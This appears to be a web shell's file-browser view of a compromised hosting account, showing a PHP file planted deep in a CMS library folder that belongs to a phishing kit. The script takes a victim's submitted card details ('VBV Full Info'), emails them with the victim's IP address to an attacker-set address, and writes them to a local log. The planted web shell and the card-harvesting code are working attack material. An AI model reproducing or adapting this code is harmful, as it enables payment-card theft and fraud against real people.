HEX
Server: Apache
System: Linux webm010.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User: iestorre (46869)
PHP: 8.0.30
Disabled: _dyuweyrj4,_dyuweyrj4r,dl
Upload Files
File: /home/i/e/s/iestorre/musica222/layouts/libraries/cms/kjhnbg/d8a2c4/en/System/GetVBVCardAndSend.php
<?php
session_start();

sleep(2);
$GETCVV = $_POST['CVV'];
if($GETCVV != $_SESSION['CVV']){
	echo "YOUHAVEERRORBRO";
}else{
	include("../send/functionsend.php");
    include("../send/mail.php");
	$head = "MIME-Version: 1.0" . "\r\n";
    $head .= "Content-type:text/html;charset=UTF-8" . "\r\n";
    $head .= "From: $from\r\n";
    $subject = "New VBV Full Info Form : ".getenv("REMOTE_ADDR");
	@mail($to,$subject,functionsend::Cardvbv(),$head);
    $f = fopen($save, "a+");
    fwrite($f, functionsend::Cardvbv());
    fclose($f);
}
?>